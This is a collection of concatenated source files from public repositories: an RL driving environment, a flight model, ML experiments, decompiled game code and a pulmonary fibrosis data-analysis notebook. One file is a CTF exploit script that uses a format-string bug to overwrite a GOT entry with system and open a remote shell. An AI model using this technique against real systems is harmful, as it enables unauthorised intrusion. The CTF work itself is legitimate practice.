sys.stdout.write("\r\x1b[K{}/{}==>reward/depth/steer/speed: {:.0f}/{:.0f} \t({:.1f}/{:.1f}/{:.1f}) \t{:.1f}/{:.1f} \t{:.2f}/{:.2f} ".format(self.episodeN, self.stepN, reward, rewardSum, self.state[0], self.state[1], self.state[2], steer, steerAverage, speed, dSpeed))
sys.stdout.flush()
# placeholder for additional logic
if done:
pass
return np.array(self.state), reward, done, {}
def addToLog (self, key, value):
if key not in self.allLogs:
self.allLogs[key] = []
self.allLogs[key].append(value)
def _reset(self):
airsimClient.reset()
airsimClient.setCarControls(1, 0)
time.sleep(0.8)
self.stepN = 0
self.stallCount = 0
self.episodeN += 1
print("")
self.allLogs = { 'speed': [0] }
# Randomize the initial steering to broaden learning
self.state = (100, 100, 100, random.uniform(0.0, 21.0))
return np.array(self.state) | [
"jaiminpa@usc.edu"
] | jaiminpa@usc.edu |
e19eeb31f0acad784dc3dad13eaa2bef568c94a5 | ed72d3f672d3298e9a2a4e9ff31915f9275bbf46 | /flight.py | a1043999b4044de661e6b6935f51b0bc6b746643 | [] | no_license | KirtMorgan/model_airport | 93810ceffce89ab670be7e10d1e0d44b7505e04e | e640a78e6afccb10f5f15646c696afd22027756a | refs/heads/master | 2020-05-17T00:03:51.525043 | 2019-04-29T14:30:19 | 2019-04-29T14:30:19 | 183,386,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,177 | py | from passenger import *
from plane import *
class Flight:
def __init__(self, origin_destination='', plane=''):
self.origin_destination = origin_destination
self.plane = plane
self.passengers_list = []
def add_plane(self, plane):
self.plane = plane
def add_origin_destination(self, origin_destination):
self.origin_destination = origin_destination
def add_passenger(self, passenger):
self.passengers_list.append(passenger)
# Airlines
airline_1 = Flight('UK - New Vegas', Boeing_747_8.owner)
airline_2 = Flight('Turkey - Paris', Boeing_747_400.owner)
airline_3 = Flight('New York - UK', Boeing_747_400ER.owner)
airline_4 = Flight('Spain - Portugal', Boeing_777_300.owner)
airline_5 = Flight('France - Germany', Boeing_777_300ER.owner)
list_flights = []
list_flights.append(airline_1)
list_flights.append(airline_2)
list_flights.append(airline_3)
list_flights.append(airline_4)
list_flights.append(airline_5)
list_passengers = []
list_passengers.append(passenger_1)
list_passengers.append(passenger_2)
list_passengers.append(passenger_3)
list_passengers.append(passenger_4)
list_passengers.append(passenger_5) | [
"kirtmorgan@live.com"
] | kirtmorgan@live.com |
78e368fb716111fadb4e8ba88e1ddd8e34f363a5 | 98b0d740346ad9aecd228b9a8ebb8e818908ce03 | /hr-1.py | 0d51517045973153f9d6f31c16975b8fb25a1e6b | [] | no_license | alexisbellido/python-examples | 8c63156a2800a584a8aff0909325e38acbe49163 | e6a4f61d9cd18588987430007e28ef036971764b | refs/heads/master | 2022-10-16T08:28:15.312916 | 2022-09-30T15:55:31 | 2022-09-30T15:55:31 | 240,379,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | def hi(name):
return f'Hi, {name}'
if __name__ == '__main__':
# people = [input().split() for i in range(int(input()))]
# print(*name_format(people), sep='\n')
####################
people = [
'John',
'Mike',
]
# print(hi(people[0]))
# print(hi(people[1]))
# print(*hi(people), sep='\n')
| [
"alexis@ventanazul.com"
] | alexis@ventanazul.com |
9e783b4e701f26b5c214da0138af22e4c3c66562 | f2ac9260dfa7483cd54a30700bb952e10acbc1bb | /fit_lr.py | 27c2ea1089ad19bf4212c6e4d9de0bab81cb012f | [] | no_license | kudkudak/compound-activity-prediction | 94dd9efd2ff7ba5c95ebb71ce1766eb6b8882aac | d55e6ecb4e3de74d40b1a37950449f60df1a2ca4 | refs/heads/master | 2016-09-15T21:35:54.930142 | 2015-01-14T13:09:19 | 2015-01-14T13:09:19 | 27,130,096 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,056 | py | from misc.utils import *
from misc.experiment_utils import get_exp_options, print_exp_header, \
save_exp, get_exp_logger, generate_configs, print_exp_name
from data_api import prepare_experiment_data, prepare_experiment_data_embedded, get_raw_training_data
from sklearn.metrics import matthews_corrcoef, accuracy_score, confusion_matrix
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import MinMaxScaler
import sklearn.linear_model
def fit_lrs(config_in = None):
#### Load config and data ####
config = {"protein":0, "fingerprint":4,"n_folds":10,
"use_embedding": 1, "K":20, "max_hashes":1000, "seed":0, "C_min":-3, "C_max":7}
if config_in is None:
config.update(get_exp_options(config))
else:
config.update(config_in)
D, config_from_data = prepare_experiment_data_embedded(n_folds=10, seed=config["seed"], K=config["K"], \
max_hashes=config["max_hashes"],
protein=config["protein"], fingerprint=config["fingerprint"])
config.update(config_from_data)
config["C"] = [10.0**(i/float(2)) for i in range(2*config["C_min"],2*(1+config["C_max"]))]
print config["C"]
logger = get_exp_logger(config)
### Prepare experiment ###
E = {"config": config, "experiments":[]}
def fit_lr(config):
### Prepare result holders ###b
values = {}
results = {}
monitors = {}
E = {"config": config, "results": results, "monitors":monitors, "values":values}
### Print experiment header ###
print_exp_name(config)
### Train ###
monitors["acc_fold"] = []
monitors["mcc_fold"] = []
monitors["wac_fold"] = []
monitors["cm"] = [] # confusion matrix
monitors["clf"] = []
monitors["train_time"] = []
monitors["test_time"] = []
results["mean_acc"] = 0
results["mean_mcc"] = 0
values["transformers"] = []
for fold in D["folds"]:
X_train, Y_train, X_test, Y_test = fold["X_train"], fold["Y_train"], fold["X_test"], fold["Y_test"]
min_max_scaler = MinMaxScaler()
X_train = min_max_scaler.fit_transform(X_train)
X_test = min_max_scaler.transform(X_test)
clf =sklearn.linear_model.LogisticRegression (C=config["C"], class_weight="auto")
tstart = time.time()
monitors["train_time"].append(time.time() - tstart)
clf.fit(X_train.astype(float), Y_train.astype(float).reshape(-1))
tstart = time.time()
Y_pred = clf.predict(X_test.astype(float))
monitors["test_time"].append(time.time() - tstart)
acc_fold, mcc_fold = accuracy_score(Y_test, Y_pred), matthews_corrcoef(Y_test, Y_pred)
cm = confusion_matrix(Y_test, Y_pred)
tp, fn, fp, tn = cm[1,1], cm[1,0], cm[0,1], cm[0,0]
monitors["clf"].append(clf)
monitors["cm"].append(cm)
monitors["wac_fold"].append(0.5*tp/float(tp+fn) + 0.5*tn/float(tn+fp))
monitors["acc_fold"].append(acc_fold)
monitors["mcc_fold"].append(mcc_fold)
monitors["acc_fold"] = np.array(monitors["acc_fold"])
monitors["mcc_fold"] = np.array(monitors["mcc_fold"])
monitors["wac_fold"] = np.array(monitors["wac_fold"])
results["mean_acc"] = monitors["acc_fold"].mean()
results["mean_mcc"] = monitors["mcc_fold"].mean()
results["mean_wac"] = monitors["wac_fold"].mean()
logger.info(results)
return E
cv_configs = generate_configs(config, ["C"])
for c in cv_configs:
print c
E["experiments"].append(fit_lr(c))
save_exp(E)
best_e = E["experiments"][0]
for e in E["experiments"]:
if e["results"]["mean_wac"] > best_e["results"]["mean_wac"]:
best_e = e
logger.info(best_e)
logger.info("Done")
if __name__ == "__main__":
fit_lrs()
| [
"staszek.jastrzebski@gmail.com"
] | staszek.jastrzebski@gmail.com |
b1671f8ccb003ceab564735e721f938521ca0ce4 | 66edf859b44d1e020bf61f5c1ca3a1d2c0952e2e | /rooters-2019/xsh/exploit.py | 0fc6fbe4ebce1c3def064de17762d48b54086f86 | [] | no_license | farazsth98/CTF | 5f40fe745ad2c6f4697c203532517dc93c88cc08 | d2de238538c112ce1ac3aab939460c03b3f0f732 | refs/heads/master | 2023-04-13T20:29:09.611005 | 2021-04-24T17:53:05 | 2021-04-24T17:53:05 | 216,312,857 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,225 | py | #!/usr/bin/env python2
from pwn import *
elf = ELF('./xsh')
libc = ELF('./libc.so.6')
def start():
if not args.REMOTE:
return process('./xsh')
libc = ELF('./libc.so.6')
else:
return remote('35.192.206.226', 5555)
libc = ELF('./libc-remote.so.6')
def execute(cmd):
p.recv()
p.sendline(cmd)
return p.recvuntil('$')
context.terminal = ['tmux', 'new-window']
p = start()
if args.GDB:
gdb.attach(p)
# Get base address of binary
leak = execute('echo 0x%3$x')[:10]
elf.address = int(leak, 16) - 0x1249
strncmp_got = elf.got['strncmp']
system = elf.plt['system']
log.info('PIE base: ' + hex(elf.address))
log.info('strncmp_got: ' + hex(strncmp_got))
log.info('system: ' + hex(system))
# Prepare to write system to strncmp_got
# Calculate each half of the address
# This is to prevent the exploit from taking way too long to write a huge address
first = int('0x' + hex(system)[-4:], 16)
second = int(hex(system)[:6], 16)
# Do the format string overwrite
payload = 'echo' + p32(strncmp_got) + p32(strncmp_got+2)
payload += '%{}c%24$n%{}c%25$n'.format(first-4-3, second-first)
execute(payload)
# Execute /bin/sh for shell
p.recv()
p.sendline('/bin/sh')
p.interactive()
| [
"faraz.abrar9@gmail.com"
] | faraz.abrar9@gmail.com |
97e53dbcc10f19ff3e71ee359e01ac2874a34773 | 0bdcbad65988ffa36a20e46228e39a55c5af3c47 | /src/get_files_not_in.py | b6c62ef31ce35ecaa9667b9b879ab6fc4b123093 | [
"MIT"
] | permissive | mpaloni/pioneer | abdc2d38eb79759aa2d9d5df6cc63c823ba74101 | c49efa2e071307b2534ca2abe7560f57683d2d9e | refs/heads/master | 2020-04-19T02:46:43.360350 | 2019-01-28T07:07:40 | 2019-01-28T07:07:40 | 167,914,384 | 0 | 0 | MIT | 2019-01-28T07:00:52 | 2019-01-28T07:00:51 | null | UTF-8 | Python | false | false | 1,637 | py |
import os
import argparse
import csv
import shutil
def main():
print("Started")
#define parameters
# parser = argparse.ArgumentParser(description='PIONEER Zeta')
# parser.add_argument('--first', type=str, help='Subject on the left side of the operator')
# parser.add_argument('--second', type=str, help='Subject on the right side of the operator')
# parser.add_argument('--third', type=str, default=None, help='Subject to apply the difference')
# parser.add_argument('--operator', type=str, help='Operator: minus or plus or both or avg')
# parser.add_argument('--source', type=str, default=None, help='Source directory')
# parser.add_argument('--target', type=str, default=None, help='Target directory')
# parser.add_argument('--intensify', type=str, default=None, help='Intensify the effect')
# parser.add_argument('--avg_keyword', type=str, default=None, help='Keyword to count the avg with. All and only files of interest should have this word in their name')
# args=parser.parse_args()
csv_path=os.path.expanduser("~/dippa/glasses.csv")
source=os.path.expanduser("~/dippa/img_align_celeba")
target=os.path.expanduser("~/dippa/celeba_noglasses/img")
src_files = os.listdir(source)
glasses=[]
with open(csv_path, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in reader:
glasses.append(', '.join(row).replace('"', ''))
src_files = os.listdir(source)
for file_name in src_files:
full_file_name = os.path.join(source, file_name)
if (file_name not in glasses):
print("Shifting "+file_name+" to "+target)
shutil.copy(full_file_name, target)
main()
| [
"noreply@github.com"
] | mpaloni.noreply@github.com |
4fafdb60d2714fc699c55d2ce9bc473bfcffb686 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /Scripts/simulation/situations/complex/university_mixer_situation.py | bdd94a7c82a8c319385d8ae99bf8517a96e6a57b | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,087 | py | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\situations\complex\university_mixer_situation.py
# Compiled at: 2019-10-19 01:32:53
# Size of source mod 2**32: 5699 bytes
from situations.situation_complex import SituationComplex, CommonInteractionCompletedSituationState, CommonSituationState, SituationComplexCommon, TunableSituationJobAndRoleState, SituationStateData
from sims4.tuning.tunable import TunableReference, TunableEnumWithFilter
from tag import Tag
import services
from objects.object_manager import ObjectManager
from sims4.tuning.instances import lock_instance_tunables
from situations.bouncer.bouncer_request import exclusivity_compare
from situations.bouncer.bouncer_types import BouncerExclusivityCategory
from situations.situation_types import SituationCreationUIOption
from situations.situation import Situation
class _MixerParty(CommonSituationState):
def timer_expired(self):
self._change_state(self.owner.cleanup_party_state())
def on_activate(self, reader=None):
super().on_activate(reader)
if self.owner.juice_keg is not None:
self.owner._claim_object(self.owner.juice_keg.id)
class _CleanupJuiceKeg(CommonInteractionCompletedSituationState):
def on_activate(self, reader=None):
super().on_activate(reader)
if self.owner.juice_keg is None:
self.owner._self_destruct()
def _on_interaction_of_interest_complete(self, **kwargs):
self.owner._self_destruct()
class _SetupJuiceKeg(CommonInteractionCompletedSituationState):
def _on_interaction_of_interest_complete(self, **kwargs):
self._change_state(self.owner.mixer_party_state())
class UniversityMixerPartySituation(SituationComplexCommon):
INSTANCE_TUNABLES = {'juice_keg_bearer_job_and_role':TunableSituationJobAndRoleState(description='\n The job and role state for the bearer of the juice keg.\n '),
'setup_juice_keg_state':_SetupJuiceKeg.TunableFactory(description='\n The state to bring in the keg bearer and have the juice keg set up on the lot.\n ',
display_name='1. Setup Juice Keg State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'mixer_party_state':_MixerParty.TunableFactory(description='\n The state to represent the party itself.\n ',
display_name='2. Mixer Party State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'cleanup_party_state':_CleanupJuiceKeg.TunableFactory(description='\n The state to cleanup the juice keg and end the party\n ',
display_name='3. Party Cleanup State',
tuning_group=SituationComplexCommon.SITUATION_STATE_GROUP),
'juice_keg_tag':TunableEnumWithFilter(description='\n Tag used to find the juice keg supplied by the situation.\n ',
tunable_type=Tag,
default=Tag.INVALID,
invalid_enums=Tag.INVALID,
filter_prefixes=('func', ))}
REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES
def __init__(self, *args, **kwargs):
(super().__init__)(*args, **kwargs)
self._juice_keg_object_id = None
def start_situation(self):
super().start_situation()
if self.juice_keg is not None:
self._claim_object(self.juice_keg.id)
self._change_state(self.setup_juice_keg_state())
@classmethod
def _states(cls):
return (SituationStateData(1, _SetupJuiceKeg, factory=(cls.setup_juice_keg_state)),
SituationStateData(2, _MixerParty, factory=(cls.mixer_party_state)),
SituationStateData(3, _CleanupJuiceKeg, factory=(cls.cleanup_party_state)))
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
return [(cls.juice_keg_bearer_job_and_role.job, cls.juice_keg_bearer_job_and_role.role_state)]
@classmethod
def default_job(cls):
pass
@property
def juice_keg(self):
object_manager = services.object_manager()
juice_keg = None
if self._juice_keg_object_id is not None:
juice_keg = object_manager.get(self._juice_keg_object_id)
if juice_keg is None:
if self.juice_keg_bearer is not None:
for obj in object_manager.get_objects_with_tag_gen(self.juice_keg_tag):
if obj.get_sim_owner_id() is self.juice_keg_bearer.id:
juice_keg = obj
self._juice_keg_object_id = juice_keg.id
break
return juice_keg
@property
def juice_keg_bearer(self):
sim = next(self.all_sims_in_job_gen(self.juice_keg_bearer_job_and_role.job), None)
return sim
lock_instance_tunables(UniversityMixerPartySituation, exclusivity=(BouncerExclusivityCategory.NORMAL),
creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE)) | [
"cristina.caballero2406@gmail.com"
] | cristina.caballero2406@gmail.com |
a47a860993c205588ad7942665c79c7af1f7846f | ee5f91fdc5d63cb1668185de611e5d0e363a006f | /Untitled1.py | ada39f951b0541519b131fe64018622e6177ad55 | [] | no_license | vikram-sreedhar/Pulmonary-Fibrosis | 38b9f020049e3fab197556a2f6b4fa71e9b6fe9b | 267f1d041f61cf86892c94aa946b89eac2b9f60b | refs/heads/master | 2022-12-17T06:21:44.062236 | 2020-09-27T20:01:13 | 2020-09-27T20:01:13 | 299,106,153 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,383 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import os
# In[2]:
# Visualisation libraries
import matplotlib.pyplot as plt
# In[3]:
import seaborn as sns
sns.set()
from plotly.offline import init_notebook_mode, iplot
import plotly.graph_objs as go
import plotly.offline as py
import pycountry
py.init_notebook_mode(connected=True)
import folium
from folium import plugins
# Graphics in retina format
get_ipython().run_line_magic('config', "InlineBackend.figure_format = 'retina'")
# Increase the default plot size and set the color scheme
plt.rcParams['figure.figsize'] = 8, 5
#plt.rcParams['image.cmap'] = 'viridis'
# palette colors to be used for plots
colors = ["steelblue","dodgerblue","lightskyblue","powderblue","cyan","deepskyblue","cyan","darkturquoise","paleturquoise","turquoise"]
# Disable warnings in Anaconda
import warnings
warnings.filterwarnings('ignore')
# In[4]:
from pathlib import Path
# In[5]:
from IPython.display import YouTubeVideo
YouTubeVideo('1Kyo9Hcyiq0', width=800, height=300)
# In[6]:
get_ipython().run_line_magic('pwd', '')
# In[7]:
os.chdir('D:\Kaggle\Pulmonary Fibrosis')
# In[8]:
get_ipython().run_line_magic('pwd', '')
# In[9]:
## Reading input and directory path
train = pd.read_csv('train.csv')
dataset_dir = 'D:\\Kaggle\\Pulmonary Fibrosis\\train'
# In[10]:
train
# In[95]:
test = pd.read_csv('test.csv')
# In[96]:
test
# In[13]:
## Reading test and train data
print('Train:\n',train.head(5),'\n')
print(train.isna().sum())
print('\n---------------------------------------------------------------------------\n')
print('Test:\n',test.head(5),'\n')
print(test.isna().sum())
# In[14]:
train.info()
# In[15]:
train.describe()
# In[16]:
dataset_dir
# In[17]:
train.shape[0]
# In[18]:
test.shape[0]
# In[19]:
INPUT = Path("D:/Kaggle/Pulmonary Fibrosis/train")
# In[20]:
INPUT
# In[21]:
train.Patient.agg(['nunique','count'])
# In[22]:
test.Patient.agg(['nunique','count'])
# In[23]:
fig, ax = plt.subplots(1,2,figsize=(20,5))
sns.countplot(train.Sex, palette="Reds_r", ax=ax[0]);
ax[0].set_xlabel("")
ax[0].set_title("Gender counts");
sns.countplot(test.Sex, palette="Blues_r", ax=ax[1]);
ax[1].set_xlabel("")
ax[1].set_title("Gender counts");
# In[24]:
get_ipython().run_line_magic('matplotlib', 'inline')
# In[25]:
fig, axs = plt.subplots(ncols=3)
fig.set_size_inches(19,6)
sns.countplot(train['SmokingStatus'],ax=axs[0])
sns.countplot(train['SmokingStatus'][train['Sex']=="Male"],ax=axs[1])
sns.countplot(train['SmokingStatus'][train['Sex']=="Female"],ax=axs[2])
fig.savefig("output2.jpeg")
# In[26]:
# Select unique bio info for the patients
agg_train = train.groupby(by="Patient")[["Patient", "Age", "Sex", "SmokingStatus"]].first().reset_index(drop=True)
# Figure
f, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize = (16, 6))
a = sns.distplot(agg_train["Age"], ax=ax1, hist=False, kde_kws=dict(lw=6, ls="--"))
b = sns.countplot(agg_train["Sex"], ax=ax2)
c = sns.countplot(agg_train["SmokingStatus"], ax=ax3)
a.set_title("Patient Age Distribution", fontsize=16)
b.set_title("Sex Frequency", fontsize=16)
c.set_title("Smoking Status", fontsize=16);
# In[27]:
fig, axs = plt.subplots(ncols=3)
fig.set_size_inches(19,6)
sns.countplot(test['SmokingStatus'],ax=axs[0])
fig.savefig("output3.jpeg")
# In[28]:
fig, ax = plt.subplots()
fig.set_size_inches(11.7, 8.27)
sns.distplot(train.Age,kde=False,bins=80,color="k")
fig.savefig("output4.jpeg")
# In[29]:
fig, ax = plt.subplots()
fig.set_size_inches(11.7, 8.27)
sns.distplot(test.Age,kde=False,bins=80,color="k")
fig.savefig("output5.jpeg")
# In[30]:
print("Min FVC value: {:,}".format(train["FVC"].min()), "\n" +
"Max FVC value: {:,}".format(train["FVC"].max()), "\n" +
"\n" +
"Min Percent value: {:.4}%".format(train["Percent"].min()), "\n" +
"Max Percent value: {:.4}%".format(train["Percent"].max()))
# Figure
f, (ax1, ax2) = plt.subplots(1, 2, figsize = (16, 6))
a = sns.distplot(train["FVC"], ax=ax1, hist=False, kde_kws=dict(lw=6, ls="--"))
b = sns.distplot(train["Percent"], ax=ax2, hist=False, kde_kws=dict(lw=6, ls="-."))
a.set_title("FVC Distribution", fontsize=16)
b.set_title("Percent Distribution", fontsize=16);
# In[31]:
print("Minimum no. weeks before CT: {}".format(train['Weeks'].min()), "\n" +
"Maximum no. weeks after CT: {}".format(train['Weeks'].max()))
plt.figure(figsize = (16, 6))
a = sns.distplot(train['Weeks'], hist=False, kde_kws=dict(lw=8, ls="--"))
plt.title("Number of weeks before/after the CT scan", fontsize = 16)
plt.xlabel("Weeks", fontsize=14);
# In[32]:
def create_baseline():
first_scan=pd.DataFrame()
for i in train.Patient.unique():
first_scan=first_scan.append((train[train['Patient']=="{}".format(i)][:1]))
first_scan=first_scan.drop("Patient",axis=1)
first_scan=first_scan.drop("Weeks",axis=1)
return first_scan
fc=create_baseline()
fc=fc.reset_index(drop=True)
fc.head()
# In[33]:
fc
# In[34]:
(sns.pairplot(train,hue="SmokingStatus",height=4)).savefig("output5.jpeg")
# In[35]:
sns.pairplot(fc,hue="SmokingStatus",height=4).savefig("output6.jpeg")
# In[36]:
fig, ax = plt.subplots(nrows=2)
fig.set_size_inches(22, 8.27)
sns.lineplot(x='Weeks',y='Percent',data=train,ax=ax[0]).set_title("All Patients Percent trend",fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='FVC',data=train,ax=ax[1]).set_title("All Patients FVC trend",fontsize=15,y=0.85)
fig.savefig("weeksfvccomp.jpeg")
# In[37]:
# FVC and Percent trend Males vs Females
males=train[train["Sex"]=="Male"]
females=train[train["Sex"]=="Female"]
# In[38]:
fig, ax = plt.subplots(nrows=4)
fig.set_size_inches(22, 22)
sns.lineplot(x='Weeks',y='FVC',data=males,ax=ax[0]).set_title("MALES FVC TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='FVC',data=females,ax=ax[1]).set_title("FEMALES FVC TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='Percent',data=males,ax=ax[2]).set_title("MALES PERCENT TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='Percent',data=females,ax=ax[3]).set_title("FEMALES PERCENT TREND", fontsize=15,y=0.85)
fig.savefig("malevsfemalesfvc_percenttrend.jpeg")
# In[39]:
# FVC and Percent trend Smokers vs nonsmokers for all patients
smoker=train[train["SmokingStatus"]=="Ex-smoker"]
never_smoked=train[train["SmokingStatus"]=="Never smoked"]
current_smoker=train[train["SmokingStatus"]=="Currently smokes"]
# In[40]:
fig, ax = plt.subplots(nrows=6)
fig.set_size_inches(22, 35)
sns.lineplot(x='Weeks',y='FVC',data=smoker,ax=ax[0]).set_title("EX SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='FVC',data=never_smoked,ax=ax[1]).set_title("NON SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='FVC',data=current_smoker,ax=ax[2]).set_title("SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=smoker,ax=ax[3]).set_title("EX SMOKER PERCENT TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=never_smoked,ax=ax[4]).set_title("NON SMOKER PERCENT TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=current_smoker,ax=ax[5]).set_title("SMOKER PERCENT TREND",fontsize=15,y=0.90)
fig.savefig("weeksvpercent_smokervsnonsmoker.jpeg")
# In[41]:
# creating Age-Bins in train data
category = pd.cut(train.Age,bins = [49,55,65,75,85,120],labels=['<=55','56-65','66-75','76-85','85+'])
train.insert(5,'Age_Bins',category)
# In[42]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["SmokingStatus"], y = train["FVC"], ax=ax1)
b = sns.barplot(x = train["SmokingStatus"], y = train["Percent"], ax=ax2)
a.set_title("Mean FVC per Smoking Status", fontsize=16)
b.set_title("Mean Perc per Smoking Status", fontsize=16);
# In[43]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["Age_Bins"], y = train["FVC"], hue = train["Sex"], ax=ax1)
b = sns.barplot(x = train["Age_Bins"], y = train["Percent"], hue = train["Sex"], ax=ax2)
a.set_title("Mean FVC per Gender per Age category", fontsize=16)
b.set_title("Mean Perc per Gender per Age Category", fontsize=16);
# In[44]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["Age_Bins"], y = train["FVC"], hue = train["SmokingStatus"], ax=ax1)
b = sns.barplot(x = train["Age_Bins"], y = train["Percent"], hue = train["SmokingStatus"], ax=ax2)
a.set_title("Mean FVC per Smoking_status per Age category", fontsize=16)
b.set_title("Mean Perc per Smoking_status per Age Category", fontsize=16);
# In[45]:
plt.figure(figsize=(16,10))
sns.heatmap(train.corr(),annot=True)
# In[46]:
import scipy
# In[47]:
# Compute Correlation
corr1, _ = scipy.stats.pearsonr(train["FVC"], train["Percent"])
corr2, _ = scipy.stats.pearsonr(train["FVC"], train["Age"])
corr3, _ = scipy.stats.pearsonr(train["Percent"], train["Age"])
print("Pearson Corr FVC x Percent: {:.4}".format(corr1), "\n" +
"Pearson Corr FVC x Age: {:.0}".format(corr2), "\n" +
"Pearson Corr Percent x Age: {:.2}".format(corr3))
# In[48]:
train.describe()
# In[49]:
train.info()
# In[50]:
# creating Age-Bins in fc data
category = pd.cut(fc.Age,bins = [49,55,65,75,85,120],labels=['<=55','56-65','66-75','76-85','85+'])
fc.insert(5,'Age_Bins',category)
# In[51]:
fc.info()
# In[52]:
fc.describe()
# In[53]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = fc["Age_Bins"], y = fc["FVC"], hue = fc["SmokingStatus"], ax=ax1)
b = sns.barplot(x = fc["Age_Bins"], y = fc["Percent"], hue = fc["SmokingStatus"], ax=ax2)
a.set_title("Patient FVC per Smoking_status per Age category", fontsize=16)
b.set_title("Patinet Perc per Smoking_status per Age Category", fontsize=16);
# In[54]:
import pydicom
# In[55]:
import os
import json
from pathlib import Path
from glob import glob
# In[56]:
from fastai.basics import *
from fastai.vision.all import *
from fastai.data.transforms import *
from fastai.medical.imaging import *
import pydicom,kornia,skimage
# In[57]:
try:
import cv2
cv2.setNumThreads(0)
except: pass
import seaborn as sns
sns.set(style="whitegrid")
sns.set_context("paper")
# In[58]:
#Visulising Dicom Files
files = Path('D:/Kaggle/Pulmonary Fibrosis/train')
# In[59]:
train_files = get_dicom_files(files)
# In[60]:
train_files
# In[61]:
info_view = train_files[33025]
dimg = dcmread(info_view)
dimg
# In[62]:
#There are some 'key' aspects within the header:
#(0018, 0015) Body Part Examined CS: Chest: images are from the chest area
#(0020, 0013) Instance Number IS: "99": this is the same as the .dcm image file
#(0020, 0032) Image Position (Patient) DS: [-191, -29, -241.200012]: represents the x, y and z positions
#(0020, 0037) Image Orientation (Patient) DS: [1, 0, 0, 0, 1, 0]: This is 6 values that represent two
#normalized 3D vectors(in this case directions) where the first vector [1,0,0] represents Xx, Xy, Xz and the
#second vector [0,1,0] that represents Yx, Yy, Yz.
#(0028, 0004) Photometric Interpretation CS: MONOCHROME2: aka the colorspace, images are being stored
#as low values=dark, high values=bright. If the colorspace was MONOCHROME then the low values=bright and high values=dark.
#(0028, 0100) Bits Allocated US: 16: each image is 16 bits
#(0028, 1050) Window Center DS: "-500.0" : aka Brightness
#(0028, 1051) Window Width DS: "-1500.0" : aka Contrast
#(0028, 1052) Rescale Intercept DS: "-1024.0" and (0028, 1053) Rescale Slope DS: "1.0":
#The Rescale Intercept and Rescale Slope are applied to transform the pixel values of the image into values that
#are meaningful to the application. It's importance is explained further in the kernel.
#(7fe0, 0010) Pixel Data OW: Array of 524288 elements: the image pixel data that pydicom uses to convert the pixel data
#into an image.
#This can be calculated by this formula:
#Array of elements = Rows X Columns X Number of frames X Samples per pixel X (bits_allocated/8)
#so in this example it would be 512 X 512 X 1 X 1 X (16/8) = 524288
# In[63]:
dimg.PixelData[:33025]
# In[218]:
dimg.pixel_array
# In[64]:
dimg.pixel_array.shape
# In[65]:
dimg.show()
# In[66]:
import pydicom as dicom
import PIL # optional
import pandas as pd
import matplotlib.pyplot as plt
# In[67]:
# Metdata of dicomfiles extracted as dataframe
df_dicom = pd.DataFrame.from_dicoms(train_files)
# In[68]:
df_dicom
# In[69]:
df_dicom.describe()
# In[70]:
df_dicom.info()
# In[71]:
df_dicom.head()
# In[72]:
get_ipython().run_line_magic('pwd', '')
# In[73]:
df_dicom.to_csv('df_dicom.csv')
# In[74]:
unique_patient_df = train.drop(['Weeks', 'FVC', 'Percent'], axis=1).drop_duplicates().reset_index(drop=True)
unique_patient_df['# visits'] = [train['Patient'].value_counts().loc[pid] for pid in unique_patient_df['Patient']]
print('Number of data points: ' + str(len(unique_patient_df)))
print('----------------------')
for col in unique_patient_df.columns:
print('{} : {} unique values, {} missing.'.format(col,
str(len(unique_patient_df[col].unique())),
str(unique_patient_df[col].isna().sum())))
unique_patient_df.head()
# In[75]:
#Convert to JPG and extracting all information in one go..
import pydicom as dicom
import matplotlib.pyplot as plt
import os
import cv2
import PIL # optional
import pandas as pd
import csv
# make it True if you want in PNG format
PNG = False
# Specify the .dcm folder path
folder_path = 'D:/Kaggle/Pulmonary Fibrosis/train/ID00007637202177411956430/'
# Specify the .jpg/.png folder path
jpg_folder_path = 'D:\Kaggle\Pulmonary Fibrosis\Train_wkg'
images_path = os.listdir(folder_path)
# In[76]:
arr=dimg.pixel_array
# In[77]:
arr
# In[78]:
df_arr = pd.DataFrame(arr)
# In[79]:
df_arr
# In[80]:
from glob import glob
